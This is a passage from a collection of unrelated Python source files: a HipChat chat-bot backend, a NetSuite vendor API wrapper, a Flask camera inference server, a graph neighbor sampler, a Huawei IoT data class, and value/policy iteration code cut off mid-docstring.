f"import pkg_resources; pkg_resources.get_distribution('{SW_PYPI_PKG_NAME}')",
]
try:
check_call(cmd)
except subprocess.CalledProcessError:
console.print(
f":confused_face: Please install {SW_PYPI_PKG_NAME} in {py_env}, cmd:"
)
console.print(
f"\t :cookie: python3 -m pip install --pre {SW_PYPI_PKG_NAME} :cookie:"
)
raise
def validate_python_environment(mode: str, py_version: str, identity: str = "") -> None:
# TODO: add os platform check
current_py_env = get_python_run_env(mode)
current_py_version = get_user_python_version(current_py_env)
if py_version and not current_py_version.startswith(py_version):
raise EnvironmentError(
f"expected python({py_version}) is not equal to detected python({current_py_version})"
)
if current_py_env != mode:
raise EnvironmentError(
f"expected mode({mode}), detected mode({current_py_env})"
)
# TODO: add venv identity check
    if mode == PythonRunEnv.CONDA and identity:
conda_name = os.environ.get(ENV_CONDA, "")
if conda_name != identity:
raise EnvironmentError(
f"expected conda name({identity}), detected current conda name({conda_name})"
)
|
115910
|
from datetime import datetime
import json
import logging
from multiprocessing.queues import Empty
from multiprocessing import Process, Queue
import random
import re
import requests
import pickle
import sys
import time
import threading
import traceback
from sleekxmpp import ClientXMPP
from sleekxmpp.exceptions import IqError, IqTimeout
from .base import IOBackend
from will import settings
from will.utils import is_admin
from will.acl import is_acl_allowed
from will.abstractions import Event, Message, Person, Channel
from will.utils import Bunch, UNSURE_REPLIES, clean_for_pickling
from will.mixins import StorageMixin, PubSubMixin
ROOM_NOTIFICATION_URL = "https://%(server)s/v2/room/%(room_id)s/notification?auth_token=%(token)s"
ROOM_TOPIC_URL = "https://%(server)s/v2/room/%(room_id)s/topic?auth_token=%(token)s"
ROOM_URL = "https://%(server)s/v2/room/%(room_id)s/?auth_token=%(token)s"
SET_TOPIC_URL = "https://%(server)s/v2/room/%(room_id)s/topic?auth_token=%(token)s"
PRIVATE_MESSAGE_URL = "https://%(server)s/v2/user/%(user_id)s/message?auth_token=%(token)s"
USER_DETAILS_URL = "https://%(server)s/v2/user/%(user_id)s?auth_token=%(token)s"
ALL_USERS_URL = ("https://%(server)s/v2/user?auth_token=%(token)s&start-index"
"=%(start_index)s&max-results=%(max_results)s")
ALL_ROOMS_URL = ("https://%(server)s/v2/room?auth_token=%(token)s&start-index"
"=%(start_index)s&max-results=%(max_results)s&expand=items")
# From RoomsMixins
V1_TOKEN_URL = "https://%(server)s/v1/rooms/list?auth_token=%(token)s"
V2_TOKEN_URL = "https://%(server)s/v2/room?auth_token=%(token)s&expand=items"
class HipChatRosterMixin(object):
@property
def people(self):
if not hasattr(self, "_people"):
self._people = self.load('will_hipchat_people', {})
return self._people
@property
def internal_roster(self):
        logging.warning(
"mixin.internal_roster has been deprecated. Please use mixin.people instead. "
"internal_roster will be removed at the end of 2017"
)
return self.people
def get_user_by_full_name(self, name):
for jid, info in self.people.items():
if info["name"] == name:
return info
return None
def get_user_by_nick(self, nick):
for jid, info in self.people.items():
if info["nick"] == nick:
return info
return None
def get_user_by_jid(self, jid):
if jid in self.people:
return self.people[jid]
return None
def get_user_from_message(self, message):
if message["type"] == "groupchat":
if "xmpp_jid" in message:
user = self.get_user_by_jid(message["xmpp_jid"])
if user:
return user
elif "from" in message:
full_name = message["from"].split("/")[1]
user = self.get_user_by_full_name(full_name)
if user:
return user
if "mucnick" in message:
return self.get_user_by_full_name(message["mucnick"])
elif message['type'] in ('chat', 'normal'):
jid = ("%s" % message["from"]).split("@")[0].split("_")[1]
return self.get_user_by_jid(jid)
else:
return None
def message_is_from_admin(self, message):
nick = self.get_user_from_message(message)['nick']
return is_admin(nick)
def message_is_allowed(self, message, acl):
nick = self.get_user_from_message(message)['nick']
return is_acl_allowed(nick, acl)
def get_user_by_hipchat_id(self, id):
for jid, info in self.people.items():
if info["hipchat_id"] == id:
return info
return None
class HipChatRoom(Bunch):
@property
def id(self):
if 'room_id' in self:
# Using API v1
return self['room_id']
elif 'id' in self:
# Using API v2
return self['id']
else:
raise TypeError('Room ID not found')
@property
def history(self):
payload = {"auth_token": settings.HIPCHAT_V2_TOKEN}
response = requests.get("https://{1}/v2/room/{0}/history".format(str(self.id),
settings.HIPCHAT_SERVER),
params=payload, **settings.REQUESTS_OPTIONS)
data = json.loads(response.text)['items']
for item in data:
item['date'] = datetime.strptime(item['date'][:-13], "%Y-%m-%dT%H:%M:%S")
return data
@property
def participants(self):
payload = {"auth_token": settings.HIPCHAT_V2_TOKEN}
response = requests.get(
"https://{1}/v2/room/{0}/participant".format(
str(self.id),
settings.HIPCHAT_SERVER
),
params=payload,
**settings.REQUESTS_OPTIONS
).json()
data = response['items']
while 'next' in response['links']:
response = requests.get(response['links']['next'],
params=payload, **settings.REQUESTS_OPTIONS).json()
data.extend(response['items'])
return data
class HipChatRoomMixin(object):
def update_available_rooms(self, q=None):
self._available_rooms = {}
# Use v1 token to grab a full room list if we can (good to avoid rate limiting)
if hasattr(settings, "V1_TOKEN"):
url = V1_TOKEN_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V1_TOKEN}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
if r.status_code == requests.codes.unauthorized:
raise Exception("V1_TOKEN authentication failed with HipChat")
for room in r.json()["rooms"]:
# Some integrations expect a particular name for the ID field.
# Better to use room.id.
room["id"] = room["room_id"]
self._available_rooms[room["name"]] = HipChatRoom(**room)
# Otherwise, grab 'em one-by-one via the v2 api.
else:
params = {}
params['start-index'] = 0
max_results = params['max-results'] = 1000
url = V2_TOKEN_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN}
while True:
resp = requests.get(url, params=params,
**settings.REQUESTS_OPTIONS)
if resp.status_code == requests.codes.unauthorized:
raise Exception("V2_TOKEN authentication failed with HipChat")
rooms = resp.json()
for room in rooms["items"]:
# Some integrations expect a particular name for the ID field.
# Better to use room.id
room["room_id"] = room["id"]
self._available_rooms[room["name"]] = HipChatRoom(**room)
logging.info('Got %d rooms', len(rooms['items']))
if len(rooms['items']) == max_results:
params['start-index'] += max_results
else:
break
self.save("hipchat_rooms", self._available_rooms)
if q:
q.put(self._available_rooms)
@property
def available_rooms(self):
if not hasattr(self, "_available_rooms"):
self._available_rooms = self.load('hipchat_rooms', None)
if not self._available_rooms:
self.update_available_rooms()
return self._available_rooms
def get_room_by_jid(self, jid):
for room in self.available_rooms.values():
if "xmpp_jid" in room and room["xmpp_jid"] == jid:
return room
return None
def get_room_from_message(self, message):
return self.get_room_from_name_or_id(message.data.channel.name)
def get_room_from_name_or_id(self, name_or_id):
for name, room in self.available_rooms.items():
if name_or_id.lower() == name.lower():
return room
if "xmpp_jid" in room and name_or_id == room["xmpp_jid"]:
return room
if "room_id" in room and name_or_id == room["room_id"]:
return room
return None
class HipChatXMPPClient(ClientXMPP, HipChatRosterMixin, HipChatRoomMixin, StorageMixin, PubSubMixin):
def start_xmpp_client(self, xmpp_bridge_queue=None, backend_name=""):
logger = logging.getLogger(__name__)
if not xmpp_bridge_queue:
logger.error("Missing required bridge queue")
self.xmpp_bridge_queue = xmpp_bridge_queue
self.backend_name = backend_name
ClientXMPP.__init__(self, "%s/bot" % settings.HIPCHAT_USERNAME, settings.HIPCHAT_PASSWORD)
if settings.USE_PROXY:
self.use_proxy = True
self.proxy_config = {
'host': settings.PROXY_HOSTNAME,
'port': settings.PROXY_PORT,
'username': settings.PROXY_USERNAME,
'password': settings.PROXY_PASSWORD,
}
self.rooms = []
self.default_room = settings.HIPCHAT_DEFAULT_ROOM
my_user_url = "https://%(server)s/v2/user/%(user_id)s?auth_token=%(token)s" % {
"user_id": settings.HIPCHAT_USERNAME.split("@")[0].split("_")[1],
"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
}
r = requests.get(my_user_url, **settings.REQUESTS_OPTIONS)
resp = r.json()
if "email" in resp:
settings.HIPCHAT_EMAIL = resp["email"]
settings.HIPCHAT_HANDLE = resp["mention_name"]
settings.HIPCHAT_NAME = resp["name"]
else:
raise EnvironmentError(
"\n\nError getting user info from Hipchat. This is usually a problem with the\n"
"username or V2 token, but here's what I heard back from them: \n\n %s\n\n" % resp
)
self.available_rooms
if hasattr(settings, "HIPCHAT_ROOMS") and settings.HIPCHAT_ROOMS:
for r in settings.HIPCHAT_ROOMS:
if r != "":
if not hasattr(self, "default_room"):
self.default_room = r
try:
self.rooms.append(self.available_rooms[r])
except KeyError:
logger.error(
u'"{0}" is not an available room, ask'
' "@{1} what are the rooms?" for the full list.'
.format(r, settings.HIPCHAT_HANDLE))
else:
for name, r in self.available_rooms.items():
if not hasattr(self, "default_room"):
self.default_room = r
self.rooms.append(r)
self.nick = settings.HIPCHAT_HANDLE
self.handle = settings.HIPCHAT_HANDLE
self.mention_handle = "@%s" % settings.HIPCHAT_HANDLE
self.whitespace_keepalive = True
self.whitespace_keepalive_interval = 30
if settings.ALLOW_INSECURE_HIPCHAT_SERVER is True:
self.add_event_handler('ssl_invalid_cert', lambda cert: True)
self.add_event_handler("roster_update", self.join_rooms)
self.add_event_handler("session_start", self.session_start)
self.add_event_handler("message", self.message_recieved)
self.add_event_handler("groupchat_message", self.room_message)
self.add_event_handler("groupchat_invite", self.room_invite)
self.add_event_handler("error", self.handle_errors)
self.add_event_handler("presence_error", self.handle_errors)
self.register_plugin('xep_0045') # MUC
def session_start(self, event):
self.send_presence()
try:
self.get_roster()
except IqError as err:
logging.error('There was an error getting the roster')
logging.error(err.iq['error']['condition'])
self.disconnect()
except IqTimeout:
logging.error('Server is taking too long to respond. Disconnecting.')
self.disconnect()
def join_rooms(self, event):
for r in self.rooms:
if "xmpp_jid" in r:
self.plugin['xep_0045'].joinMUC(r["xmpp_jid"], settings.HIPCHAT_NAME, wait=True)
def handle_errors(self, event):
print("got error event")
print(event)
def room_invite(self, event):
logging.info("Invite recieved for %s" % event)
for r in self.rooms:
if "xmpp_jid" in r:
self.plugin['xep_0045'].joinMUC(r["xmpp_jid"], settings.HIPCHAT_NAME, wait=True)
def update_will_roster_and_rooms(self):
people = self.load('will_hipchat_people', {})
# Loop through the connected rooms (self.roster comes from ClientXMPP)
for roster_id in self.roster:
cur_roster = self.roster[roster_id]
# Loop through the users in a given room
for user_id in cur_roster:
user_data = cur_roster[user_id]
if user_data["name"] != "":
# If we don't have this user in the people, add them.
                if user_id not in people:
people[user_id] = Person()
hipchat_id = user_id.split("@")[0].split("_")[1]
# Update their info
people[user_id].update({
"name": user_data["name"],
"jid": user_id,
"hipchat_id": hipchat_id,
})
# If we don't have a nick yet, pull it and mention_name off the master user list.
if not hasattr(people[user_id], "nick") and hipchat_id in self.people:
                    user_data = self.people[hipchat_id]
people[user_id].nick = user_data["mention_name"]
people[user_id].mention_name = user_data["mention_name"]
# If it's me, save that info!
if people[user_id].get("name", "") == self.nick:
self.me = people[user_id]
self.save("will_hipchat_people", people)
self.update_available_rooms()
def room_message(self, msg):
self._send_to_backend(msg)
    def message_received(self, msg):
if msg['type'] in ('chat', 'normal'):
self._send_to_backend(msg)
def real_sender_jid(self, msg):
# There's a bug in sleekXMPP where it doesn't set the "from_jid" properly.
# Thus, this hideous hack.
msg_str = "%s" % msg
start = 'from_jid="'
start_pos = msg_str.find(start)
if start_pos != -1:
cut_start = start_pos + len(start)
return msg_str[cut_start:msg_str.find('"', cut_start)]
return msg["from"]
def _send_to_backend(self, msg):
stripped_msg = Bunch()
# TODO: Find a faster way to do this - this is crazy.
for k, v in msg.__dict__.items():
try:
pickle.dumps(v)
stripped_msg[k] = v
            except Exception:
pass
for k in msg.xml.keys():
try:
# print(k)
# print(msg.xml.get(k))
pickle.dumps(msg.xml.get(k))
stripped_msg[k] = msg.xml.get(k)
            except Exception:
# print("failed to parse %s" % k)
pass
stripped_msg.xmpp_jid = msg.getMucroom()
stripped_msg.body = msg["body"]
self.xmpp_bridge_queue.put(stripped_msg)
class HipChatBackend(IOBackend, HipChatRosterMixin, HipChatRoomMixin, StorageMixin):
friendly_name = "HipChat"
internal_name = "will.backends.io_adapters.hipchat"
required_settings = [
{
"name": "HIPCHAT_USERNAME",
"obtain_at": """1. Go to hipchat, and create a new user for will.
2. Log into will, and go to Account settings>XMPP/Jabber Info.
3. On that page, the 'Jabber ID' is the value you want to use.""",
},
{
"name": "HIPCHAT_PASSWORD",
"obtain_at": (
"1. Go to hipchat, and create a new user for will. "
"Note that password - this is the value you want. "
"It's used for signing in via XMPP."
),
},
{
"name": "HIPCHAT_V2_TOKEN",
"obtain_at": """1. Log into hipchat using will's user.
2. Go to https://your-org.hipchat.com/account/api
3. Create a token.
4. Copy the value - this is the HIPCHAT_V2_TOKEN.""",
}
]
def send_direct_message(self, user_id, message_body, html=False, card=None, notify=False, **kwargs):
if kwargs:
logging.warn("Unknown keyword args for send_direct_message: %s" % kwargs)
format = "text"
if html:
format = "html"
try:
# https://www.hipchat.com/docs/apiv2/method/private_message_user
url = PRIVATE_MESSAGE_URL % {"server": settings.HIPCHAT_SERVER,
"user_id": user_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"message": message_body,
"message_format": format,
"notify": notify,
"card": card,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
r = requests.post(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
r.raise_for_status()
        except Exception:
logging.critical("Error in send_direct_message: \n%s" % traceback.format_exc())
def send_room_message(self, room_id, message_body, html=False, color="green", notify=False, card=None, **kwargs):
if kwargs:
logging.warn("Unknown keyword args for send_room_message: %s" % kwargs)
format = "text"
if html:
format = "html"
try:
# https://www.hipchat.com/docs/apiv2/method/send_room_notification
url = ROOM_NOTIFICATION_URL % {"server": settings.HIPCHAT_SERVER,
"room_id": room_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"message": message_body,
"message_format": format,
"color": color,
"notify": notify,
"card": card,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
r = requests.post(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
r.raise_for_status()
        except Exception:
logging.critical("Error in send_room_message: \n%s" % traceback.format_exc())
def set_room_topic(self, room_id, topic):
try:
# https://www.hipchat.com/docs/apiv2/method/send_room_notification
url = ROOM_TOPIC_URL % {"server": settings.HIPCHAT_SERVER,
"room_id": room_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"topic": topic,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
requests.put(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
        except Exception:
logging.critical("Error in set_room_topic: \n%s" % traceback.format_exc())
def get_room_from_message(self, event):
kwargs = {}
if hasattr(event, "kwargs"):
kwargs.update(event.kwargs)
if hasattr(event, "source_message") and event.source_message:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
if send_source.is_private_chat:
# Private, 1-1 chats.
return False
else:
# We're in a public room
return send_source.channel.id
else:
# Came from webhook/etc
if "room" in kwargs:
return kwargs["room"],
else:
return self.get_room_from_name_or_id(settings.HIPCHAT_DEFAULT_ROOM)["room_id"]
return False
def get_hipchat_user(self, user_id, q=None):
url = USER_DETAILS_URL % {"server": settings.HIPCHAT_SERVER,
"user_id": user_id,
"token": settings.HIPCHAT_V2_TOKEN}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
if q:
q.put(r.json())
else:
return r.json()
@property
def people(self):
if not hasattr(self, "_people"):
full_roster = {}
# Grab the first roster page, and populate full_roster
url = ALL_USERS_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
"start_index": 0,
"max_results": 1000}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for user in r.json()['items']:
full_roster["%s" % (user['id'],)] = Person(
id=user["id"],
handle=user["mention_name"],
mention_handle="@%s" % user["mention_name"],
source=clean_for_pickling(user),
name=user["name"],
)
# Keep going through the next pages until we're out of pages.
while 'next' in r.json()['links']:
url = "%s&auth_token=%s" % (r.json()['links']['next'], settings.HIPCHAT_V2_TOKEN)
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for user in r.json()['items']:
full_roster["%s" % (user['id'],)] = Person(
id=user["id"],
handle=user["mention_name"],
mention_handle="@%s" % user["mention_name"],
source=clean_for_pickling(user),
name=user["name"],
)
self._people = full_roster
for k, u in full_roster.items():
if u.handle == settings.HIPCHAT_HANDLE:
self.me = u
return self._people
@property
def channels(self):
if not hasattr(self, "_channels"):
all_rooms = {}
# Grab the first roster page, and populate all_rooms
url = ALL_ROOMS_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
"start_index": 0,
"max_results": 1000}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for room in r.json()['items']:
# print(room)
all_rooms["%s" % (room['xmpp_jid'],)] = Channel(
id=room["id"],
name=room["name"],
source=clean_for_pickling(room),
members={},
)
# Keep going through the next pages until we're out of pages.
while 'next' in r.json()['links']:
url = "%s&auth_token=%s" % (r.json()['links']['next'], settings.HIPCHAT_V2_TOKEN)
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for room in r.json()['items']:
all_rooms["%s" % (room['xmpp_jid'],)] = Channel(
id=room["id"],
name=room["name"],
source=clean_for_pickling(room),
members={}
)
self._channels = all_rooms
return self._channels
def normalize_incoming_event(self, event):
logging.debug("hipchat: normalize_incoming_event - %s" % event)
if event["type"] in ("chat", "normal", "groupchat") and ("from_jid" in event or "from" in event):
sender = self.get_user_from_message(event)
interpolated_handle = "@%s" % self.me.handle
will_is_mentioned = False
will_said_it = False
            channel = None
            # default so groupchat events without an xmpp_jid cannot hit a NameError below
            is_private_chat = False
            if "xmpp_jid" in event and event["xmpp_jid"]:
                channel = clean_for_pickling(self.channels[event["xmpp_jid"]])
            elif event["type"] in ("chat", "normal"):
                is_private_chat = True
if is_private_chat or event["body"].startswith(interpolated_handle):
is_direct = True
if event["body"].startswith(interpolated_handle):
event["body"] = event["body"][len(interpolated_handle):].strip()
if interpolated_handle in event["body"]:
will_is_mentioned = True
if sender and self.me and sender.id == self.me.id:
will_said_it = True
m = Message(
content=event["body"],
is_direct=is_direct,
is_private_chat=is_private_chat,
is_group_chat=not is_private_chat,
backend=self.internal_name,
sender=sender,
channel=channel,
will_is_mentioned=will_is_mentioned,
will_said_it=will_said_it,
backend_supports_acl=True,
original_incoming_event=clean_for_pickling(event),
)
# print("normalized:")
# print(m.__dict__)
return m
else:
# print("Unknown event type")
# print(event)
return None
def handle_outgoing_event(self, event):
kwargs = {}
if hasattr(event, "kwargs"):
kwargs.update(event.kwargs)
room = None
passed_room = None
if "room" in kwargs:
passed_room = kwargs["room"]
if "channel" in kwargs:
passed_room = kwargs["channel"]
if passed_room:
if isinstance(passed_room, str):
# User passed in a room string
room = self.get_room_from_name_or_id(passed_room)
else:
# User found the internal HipChatRoom object and passed it.
room = passed_room
else:
# Default to the room we heard this message in.
room = self.get_room_from_message(event)
room_id = None
if room and hasattr(room, "id"):
room_id = room.id
else:
room_id = room
if event.type in ["say", "reply"]:
event.content = re.sub(r'>\s+<', '><', event.content)
if hasattr(event, "source_message") and event.source_message and not room:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
if send_source.is_private_chat:
# Private, 1-1 chats.
self.send_direct_message(send_source.sender.id, event.content, **kwargs)
return
# Otherwise trust room.
self.send_room_message(
room_id,
event.content,
**kwargs
)
elif event.type in ["topic_change", ]:
if room_id:
self.set_room_topic(room_id, event.content)
else:
if hasattr(event, "source_message") and event.source_message:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
self.send_direct_message(send_source.sender.id, "I can't set the topic of a one-to-one chat. Let's just talk.", **kwargs)
elif (
event.type == "message.no_response"
and event.data.is_direct
and event.data.will_said_it is False
):
if event.data.original_incoming_event.type == "groupchat":
self.send_room_message(
event.data.channel.id,
random.choice(UNSURE_REPLIES),
**kwargs
)
else:
self.send_direct_message(
event.data.sender.id,
random.choice(UNSURE_REPLIES),
**kwargs
)
def __handle_bridge_queue(self):
while True:
try:
try:
input_event = self.xmpp_bridge_queue.get(timeout=settings.EVENT_LOOP_INTERVAL)
if input_event:
self.handle_incoming_event(input_event)
except Empty:
pass
except (KeyboardInterrupt, SystemExit):
pass
self.sleep_for_event_loop()
def bootstrap(self):
        # Bootstrap must provide a way to have:
# a) self.normalize_incoming_event fired, or incoming events put into self.incoming_queue
# b) any necessary threads running for a)
# c) self.me (Person) defined, with Will's info
# d) self.people (dict of People) defined, with everyone in an organization/backend
# e) self.channels (dict of Channels) defined, with all available channels/rooms.
# Note that Channel asks for members, a list of People.
# f) A way for self.handle, self.me, self.people, and self.channels to be kept accurate,
# with a maximum lag of 60 seconds.
self.client = HipChatXMPPClient("%s/bot" % settings.HIPCHAT_USERNAME, settings.HIPCHAT_PASSWORD)
self.xmpp_bridge_queue = Queue()
self.client.start_xmpp_client(
xmpp_bridge_queue=self.xmpp_bridge_queue,
backend_name=self.internal_name,
)
self.client.connect()
        # Even though these are properties, accessing them fetches and caches people and channels.
self.people
self.channels
self.bridge_thread = Process(target=self.__handle_bridge_queue)
self.bridge_thread.start()
self.xmpp_thread = Process(target=self.client.process, kwargs={"block": True})
self.xmpp_thread.start()
def terminate(self):
if hasattr(self, "xmpp_thread"):
self.xmpp_thread.terminate()
if hasattr(self, "bridge_thread"):
self.bridge_thread.terminate()
while (
(hasattr(self, "xmpp_thread") and self.xmpp_thread.is_alive())
or (hasattr(self, "bridge_thread") and self.bridge_thread.is_alive())
):
time.sleep(0.2)
|
115924
|
from collections import OrderedDict
from .base import ApiBase
import logging
logger = logging.getLogger(__name__)
class Vendors(ApiBase):
SIMPLE_FIELDS = [
'accountNumber',
'addressbookList',
'altEmail',
'altName',
'altPhone',
'balance',
'balancePrimary',
'bcn',
'billPay',
'comments',
'companyName',
'creditLimit',
'currencyList',
'customFieldList',
'dateCreated',
'defaultAddress',
'eligibleForCommission',
'email',
'emailPreference',
'emailTransactions',
'entityId',
'fax',
'faxTransactions',
'firstName',
'giveAccess',
'globalSubscriptionStatus',
'homePhone',
'internalId',
'is1099Eligible',
'isAccountant',
'isInactive',
'isJobResourceVend',
'isPerson',
'laborCost',
'lastModifiedDate',
'lastName',
'legalName',
'middleName',
'mobilePhone',
'openingBalance',
'openingBalanceDate',
'password',
'<PASSWORD>',
'phone',
'phoneticName',
'predConfidence',
'predictedDays',
'pricingScheduleList',
'printOnCheckAs',
'printTransactions',
'purchaseOrderAmount',
'purchaseOrderQuantity',
'purchaseOrderQuantityDiff',
'receiptAmount',
'receiptQuantity',
'receiptQuantityDiff',
'requirePwdChange',
'rolesList',
'salutation',
'sendEmail',
'subscriptionsList',
'taxIdNum',
'taxRegistrationList',
'title',
'unbilledOrders',
'unbilledOrdersPrimary',
'url',
'vatRegNumber',
'nullFieldList',
]
RECORD_REF_FIELDS = [
'category',
'customForm',
'defaultTaxReg',
'expenseAccount',
'image',
'incoterm',
'openingBalanceAccount',
'payablesAccount',
'taxItem',
'terms',
]
def __init__(self, ns_client):
ApiBase.__init__(self, ns_client=ns_client, type_name='Vendor')
def post(self, data) -> OrderedDict:
assert data['externalId'], 'missing external id'
vendor = self.ns_client.Vendor(externalId=data['externalId'])
vendor['currency'] = self.ns_client.RecordRef(**(data['currency']))
vendor['subsidiary'] = self.ns_client.RecordRef(**(data['subsidiary']))
vendor['representingSubsidiary'] = self.ns_client.RecordRef(**(data['representingSubsidiary']))
vendor['workCalendar'] = self.ns_client.RecordRef(**(data['workCalendar']))
self.build_simple_fields(self.SIMPLE_FIELDS, data, vendor)
self.build_record_ref_fields(self.RECORD_REF_FIELDS, data, vendor)
logger.debug('able to create vendor = %s', vendor)
res = self.ns_client.upsert(vendor)
return self._serialize(res)
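    # Hedged example of the payload `post` expects; keys follow the field
    # lists above and the RecordRef lookups in the method, but every id and
    # value here is illustrative, not real NetSuite data:
    #
    #   vendors.post({
    #       "externalId": "vendor-001",
    #       "companyName": "Acme Supplies",
    #       "currency": {"internalId": "1"},
    #       "subsidiary": {"internalId": "2"},
    #       "representingSubsidiary": {"internalId": "2"},
    #       "workCalendar": {"internalId": "1"},
    #       "expenseAccount": {"internalId": "58"},
    #   })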
|
115993
|
import cv2
import os, logging, time, json
import requests, base64
from flask import Flask, jsonify, request, Response
import numpy as np
# for HTTP/1.1 support
from werkzeug.serving import WSGIRequestHandler
app = Flask(__name__)
logging.basicConfig(format='%(asctime)s %(levelname)-10s %(message)s', datefmt="%Y-%m-%d-%H-%M-%S",
level=logging.INFO)
def main():
pass
def grab_image_from_stream():
repeat = 3
wait = 3
frame = None
    for _ in range(repeat):
        try:
            video_capture = cv2.VideoCapture(args.camera)
            video_capture.set(cv2.CAP_PROP_BUFFERSIZE, 1)
            frame = video_capture.read()[1]
            video_capture.release()  # release the handle so the stream is not leaked
            break
        except Exception:
            # try to re-capture the stream
            logging.info("Could not capture video. Recapturing and retrying...")
            time.sleep(wait)
if frame is None:
logging.info("Failed to capture frame, sending blank image")
        frame = np.zeros((300, 300, 3), dtype=np.uint8)  # uint8 so cv2.imencode accepts it
return frame
@app.route('/image/700')
def video_image():
frame = grab_image_from_stream()
_, jpeg = cv2.imencode('.jpg', frame)
    response = Response(jpeg.tobytes(), headers={"content-length": str(len(jpeg))}, mimetype="image/jpeg")
return response
@app.route('/image/800')
def video_image_and_inference():
frame = grab_image_from_stream()
frame = cv2.resize(frame, (300, 300))
_, jpeg = cv2.imencode('.jpg', frame)
resp_img = jpeg.tobytes()
scoring_url = "http://grocerymodel:5001/score"
json_img = json.dumps({"img": frame.tolist()})
input_data = json_img
headers = {'Content-Type':'application/json'}
resp = requests.post(scoring_url, input_data, headers=headers)
logging.info(f'received response: {resp.status_code}')
resp_json = json.loads(resp.content)
resp_json["img"] = str(base64.b64encode(resp_img), "utf-8")
return jsonify(resp_json)
def start_app():
# set protocol to 1.1 so we keep the connection open
WSGIRequestHandler.protocol_version = "HTTP/1.1"
if args.fast:
logging.info("Running the `fast` version")
app.run(host="0.0.0.0", port=args.port)
else:
logging.info(f"Staring regular inventory cam. Port: {args.port}")
app.run(debug=False)
if __name__ == "__main__":
from cmdline import cmd_args
args = cmd_args.parse_camera_args()
if not args.fast:
app.config['SERVER_NAME'] = f'inventorycam:{args.port}'
if args.debug:
logging.info("Please attach a debugger to port 5678")
import ptvsd
ptvsd.enable_attach(('0.0.0.0', 5681))
ptvsd.wait_for_attach()
ptvsd.break_into_debugger()
start_app()
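# Hedged usage note (host and port depend on the deployment flags above;
# the values here are placeholders):
#   curl http://<host>:<port>/image/700 --output frame.jpg
#   curl http://<host>:<port>/image/800   # JSON: model response + base64 "img"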
|
116005
|
from layers import Layer
import tensorflow as tf
class UniformNeighborSampler(Layer):
"""
Uniformly samples neighbors.
Assumes that adj lists are padded with random re-sampling
"""
def __init__(self, adj_info, **kwargs):
super(UniformNeighborSampler, self).__init__(**kwargs)
self.adj_info = adj_info
def _call(self, inputs):
ids, num_samples = inputs
adj_lists = tf.nn.embedding_lookup(self.adj_info, ids)
        # shuffle along the neighbor axis so the slice below is a uniform sample
        adj_lists = tf.transpose(tf.random_shuffle(tf.transpose(adj_lists)))
adj_lists = tf.slice(adj_lists, [0,0], [-1, num_samples])
return adj_lists
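# Hedged usage sketch, assuming TensorFlow 1.x (matching tf.random_shuffle
# above) and that `layers.Layer.__call__` dispatches to `_call`:
#
#   adj_info = tf.constant([[1, 2, 3, 4],
#                           [5, 6, 7, 8]], dtype=tf.int32)
#   sampler = UniformNeighborSampler(adj_info)
#   sampled = sampler((tf.constant([0, 1]), 2))  # 2 neighbors per node
#   # `sampled` has shape (2, 2): a random 2-subset of each adjacency list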
|
116089
|
from com.huawei.iotplatform.client.dto.ServiceCommand import ServiceCommand
from com.huawei.iotplatform.client.dto.ServiceProperty import ServiceProperty
class ServiceCapabilityDTO(object):
    def __init__(self):
        self.serviceId = None
        self.serviceType = None
        self.option = None
        self.description = None
        # per-instance defaults so instances do not share mutable state
        self.commands = ServiceCommand()
        self.properties = ServiceProperty()
def getServiceId(self):
return self.serviceId
def setServiceId(self, serviceId):
self.serviceId = serviceId
def getServiceType(self):
return self.serviceType
def setServiceType(self, serviceType):
self.serviceType = serviceType
def getOption(self):
return self.option
def setOption(self, option):
self.option = option
def getDescription(self):
return self.description
def setDescription(self, description):
self.description = description
def getCommands(self):
return self.commands
def setCommands(self, commands):
self.commands = commands
def getProperties(self):
return self.properties
def setProperties(self, properties):
self.properties = properties
|
116126
|
import numpy as np
# global stopping criteria
EPS = 0.001
def value_iteration(model, maxiter=100):
"""
Solves the supplied environment with value iteration.
Parameters
----------
model : python object
Holds information about the environment to solve
such as the reward structure and the transition dynamics.
maxiter : int
The maximum number of iterations to perform.
Return
------
val_ : numpy array of shape (N, 1)
Value function of the environment where N is the number
of states in the environment.
pi : numpy array of shape (N, 1)
Optimal policy of the environment.
"""
# initialize the value function and policy
pi = np.ones((model.num_states, 1))
val_ = np.zeros((model.num_states, 1))
for i in range(maxiter):
# initialize delta
delta = 0
# perform Bellman update for each state
for state in range(model.num_states):
# store old value
tmp = val_[state].copy()
# compute the value function
val_[state] = np.max( np.sum((model.R[state] + model.gamma * val_) * model.P[state,:,:], 0) )
# find maximum change in value
            delta = max(delta, np.abs(tmp - val_[state]).item())
# stopping criteria
if delta <= EPS * (1 - model.gamma) / model.gamma:
print("Value iteration converged after %d iterations." % i)
break
# compute the policy
for state in range(model.num_states):
pi[state] = np.argmax(np.sum(val_ * model.P[state,:,:],0))
return val_, pi
def policy_iteration(model, maxiter):
"""
Solves the supplied environment with policy iteration.
Parameters
----------
model : python object
Holds information about the environment to solve
such as the reward structure and the transition dynamics.
maxiter : int
The maximum number of iterations to perform.
Return
------
val_ : numpy array of shape (N, 1)
Value function of the environment where N is the number
of states in the environment.
